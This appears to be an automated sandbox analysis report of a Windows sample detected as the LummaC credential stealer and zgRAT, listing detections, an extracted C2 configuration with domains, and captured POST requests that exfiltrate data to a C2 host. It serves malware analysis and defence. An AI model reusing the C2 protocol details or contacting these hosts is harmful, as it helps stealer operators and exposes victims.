Edit tour

Windows Analysis Report
TT4ybwWc1T.exe

Overview

General Information

Sample Name:	TT4ybwWc1T.exe
Original Sample Name:	A7DCEF177AF8AC4D8FF3A4A2FFA635CE.exe
Analysis ID:	1338247
MD5:	a7dcef177af8ac4d8ff3a4a2ffa635ce
SHA1:	567f11c22c9651cb1db4ff29c1535a1893bc7c27
SHA256:	d2c7f4155786a209bdf84fb13f664fb283eaaeb7607d23ff4e5edae510f1ecd8
Tags:	exeLummaStealer
Infos:

Detection

LummaC Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected LummaC Stealer

Multi AV Scanner detection for submitted file

Yara detected zgRAT

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Writes to foreign memory regions

Query firmware table information (likely to detect VMs)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Searches for user specific document files

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

TT4ybwWc1T.exe (PID: 5496 cmdline: C:\Users\user\Desktop\TT4ybwWc1T.exe MD5: A7DCEF177AF8AC4D8FF3A4A2FFA635CE)

RegAsm.exe (PID: 7208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["voloknus.pw", "bluepablo.fun", "howlcars.fun", "comperssw.fun", "duhodown.fun", "kowersize.fun", "mouseoiet.fun", "plengreg.fun", "zamesblack.fun", "voloknus.pw", "bluepablo.fun", "howlcars.fun", "comperssw.fun", "duhodown.fun", "kowersize.fun", "mouseoiet.fun", "plengreg.fun", "zamesblack.fun"], "Build id": "EEERHh--seh1"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
TT4ybwWc1T.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
TT4ybwWc1T.exe	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x19e1d2:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TT4ybwWc1T.exe PID: 5496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7208	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7208	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7208	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.TT4ybwWc1T.exe.460000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.TT4ybwWc1T.exe.460000.0.unpack	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x19e1d2:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

Snort Signatures

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In - Source IP: 192.168.2.8 - Destination IP: 104.21.84.113

Timestamp:	192.168.2.8104.21.84.11349707802048093 11/07/23-15:21:09.706614
SID:	2048093
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.8 - Destination IP: 104.21.84.113

Timestamp:	192.168.2.8104.21.84.11349706802048094 11/07/23-15:21:10.249764
SID:	2048094
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.8 - Destination IP: 104.21.84.113

Timestamp:	192.168.2.8104.21.84.11349738802048094 11/07/23-15:21:44.390174
SID:	2048094
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.TT4ybwWc1T.exe.45fb8a0.3.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["voloknus.pw", "bluepablo.fun", "howlcars.fun", "comperssw.fun", "duhodown.fun", "kowersize.fun", "mouseoiet.fun", "plengreg.fun", "zamesblack.fun", "voloknus.pw", "bluepablo.fun", "howlcars.fun", "comperssw.fun", "duhodown.fun", "kowersize.fun", "mouseoiet.fun", "plengreg.fun", "zamesblack.fun"], "Build id": "EEERHh--seh1"}

Multi AV Scanner detection for submitted file

Source: TT4ybwWc1T.exe	ReversingLabs: Detection: 52%
Source: TT4ybwWc1T.exe	Virustotal: Detection: 65%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: TT4ybwWc1T.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://voloknus.pw/	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/2nekt9Tpzu4t9UGz	Avira URL Cloud: Label: malware
Source: voloknus.pw	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/P-	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/E(	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/api6wuOtdB	Avira URL Cloud: Label: malware
Source: http://voloknus.pw:80/api-	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/S	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apiMpU5lT	Avira URL Cloud: Label: malware
Source: mouseoiet.fun	Avira URL Cloud: Label: malware
Source: bluepablo.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apiSuH/iWh	Avira URL Cloud: Label: malware
Source: zamesblack.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/api-	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apif3h5zg	Avira URL Cloud: Label: malware
Source: http://voloknus.pw:80/api	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/api3	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/api4	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/api	Avira URL Cloud: Label: malware
Source: plengreg.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apigwlhGzn	Avira URL Cloud: Label: malware
Source: howlcars.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/)	Avira URL Cloud: Label: malware
Source: duhodown.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apiX	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apiV	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apiS	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/(	Avira URL Cloud: Label: malware
Source: kowersize.fun	Avira URL Cloud: Label: malware
Source: comperssw.fun	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apib	Avira URL Cloud: Label: malware
Source: http://voloknus.pw/apie	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: mouseoiet.fun	Virustotal: Detection: 20%	Perma Link
Source: zamesblack.fun	Virustotal: Detection: 15%	Perma Link
Source: bluepablo.fun	Virustotal: Detection: 18%	Perma Link
Source: http://voloknus.pw:80/api	Virustotal: Detection: 7%	Perma Link
Source: http://voloknus.pw/api	Virustotal: Detection: 7%	Perma Link
Source: duhodown.fun	Virustotal: Detection: 20%	Perma Link
Source: plengreg.fun	Virustotal: Detection: 15%	Perma Link
Source: howlcars.fun	Virustotal: Detection: 15%	Perma Link
Source: kowersize.fun	Virustotal: Detection: 20%	Perma Link
Source: comperssw.fun	Virustotal: Detection: 20%	Perma Link

Machine Learning detection for sample

Source: TT4ybwWc1T.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93DD20 CryptReleaseContext,	0_2_6C93DD20
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93DEE0 CryptReleaseContext,	0_2_6C93DEE0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93DE00 CryptGenRandom,__CxxThrowException@8,	0_2_6C93DE00
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93D9D0 CryptAcquireContextA,GetLastError,	0_2_6C93D9D0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	0_2_6C93DBB0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C9635E0 CryptReleaseContext,	0_2_6C9635E0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93D7D4 CryptReleaseContext,	0_2_6C93D7D4
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C93D7F0 CryptReleaseContext,	0_2_6C93D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004419D4 CryptStringToBinaryA,CryptStringToBinaryA,_strlen,	2_2_004419D4

Source: TT4ybwWc1T.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: TT4ybwWc1T.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: TT4ybwWc1T.exe, 00000000.00000002.1380457210.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.0000000006124000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: TT4ybwWc1T.exe, 00000000.00000002.1375458555.0000000006056000.00000004.00000800.00020000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1380457210.0000000006FFA000.00000004.08000000.00040000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.00000000061E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: sensible_and_easy_to_assist.pdb source: TT4ybwWc1T.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00462BD8 FindFirstFileExW,		2_2_00462BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00462C8C FindFirstFileExW,FindNextFileW,FindClose,FindClose,		2_2_00462C8C

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_056DBCC0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_056DBCB9
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then jmp 056DB8AAh	0_2_056DB738
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then jmp 056DB8AAh	0_2_056D6710
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then jmp 056DB8AAh	0_2_056DB7F0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3788
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3780
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3678
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3670
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_056D26A4
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D39A8
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D39A0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_056D0818
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3898
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_056D3890

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.8:49707 -> 104.21.84.113:80
Source: Traffic	Snort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.8:49706 -> 104.21.84.113:80
Source: Traffic	Snort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.8:49738 -> 104.21.84.113:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: voloknus.pw
Source: Malware configuration extractor	URLs: bluepablo.fun
Source: Malware configuration extractor	URLs: howlcars.fun
Source: Malware configuration extractor	URLs: comperssw.fun
Source: Malware configuration extractor	URLs: duhodown.fun
Source: Malware configuration extractor	URLs: kowersize.fun
Source: Malware configuration extractor	URLs: mouseoiet.fun
Source: Malware configuration extractor	URLs: plengreg.fun
Source: Malware configuration extractor	URLs: zamesblack.fun
Source: Malware configuration extractor	URLs: voloknus.pw
Source: Malware configuration extractor	URLs: bluepablo.fun
Source: Malware configuration extractor	URLs: howlcars.fun
Source: Malware configuration extractor	URLs: comperssw.fun
Source: Malware configuration extractor	URLs: duhodown.fun
Source: Malware configuration extractor	URLs: kowersize.fun
Source: Malware configuration extractor	URLs: mouseoiet.fun
Source: Malware configuration extractor	URLs: plengreg.fun
Source: Malware configuration extractor	URLs: zamesblack.fun

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 8Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Host: voloknus.pwContent-Length: 78Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 45 45 45 52 48 68 2d 2d 73 65 68 31 26 6a 3d 34 64 62 61 63 65 39 31 32 35 34 66 64 36 34 65 36 31 31 65 37 32 64 30 34 38 31 61 65 39 62 63 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=EEERHh--seh1&j=4dbace91254fd64e611e72d0481ae9bc&ver=4.0
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 16558Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 19106Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 20267Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
